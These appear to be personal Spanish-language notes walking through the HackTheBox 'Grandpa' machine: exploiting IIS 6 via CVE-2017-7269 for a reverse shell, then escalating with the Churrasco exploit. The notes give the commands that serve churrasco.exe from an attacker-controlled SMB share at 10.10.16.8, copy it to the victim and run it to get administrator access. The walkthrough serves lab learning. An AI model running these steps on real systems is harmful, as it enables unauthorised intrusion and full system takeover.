Notas de Luis

Hacemos el escaneo con nmap:

Vemos un servicio de IIS en su versión 6 corriendo por el puerto 80, por lo que vamos a mirar:

Pero vamos a ver si hay exploits para explotar esta versión de IIS, donde vemos que sí con el CVE-2017-7269:

Y ahora poniendo esto otro en google ya vemos un exploit:

Y aquí vemos las instrucciones de cómo usar este exploit:

Por tanto lo lanzamos siguiendo estas instrucciones:

Y recibimos la reverse shell:

Y ya siendo el usuario administrador del servicio de la red:

Pero para escalar privilegios, tenemos que enumerar privilegios del sistema con el usuario que ya somos, usando el siguiente comando:

whoami/priv

Y vemos un privilegio que al estar habilitado nos puede servir para escalar:

Por tanto esto es vulnerable a rotten potato, por tanto hay un exploit llamado churrasco:

https://github.com/Re4son/Churrasco/

Nos lo compartimos con la máquina víctima:

impacket-smbserver recurso $(pwd) -smb2support

Dentro de la máquina víctima nos ubicamos dentro del directorio temp y aquí nos bajamos el archivo:

copy \\10.10.16.8\recurso\churrasco.exe churrasco.exe

Y ahora ejecutamos el siguiente comando con churrasco y ya somos el usuario administrador:

churrasco.exe -d "cmd.exe"

computing/hacking/ctf/hackthebox/maquina_grandpa.txt · Última modificación: por 127.0.0.1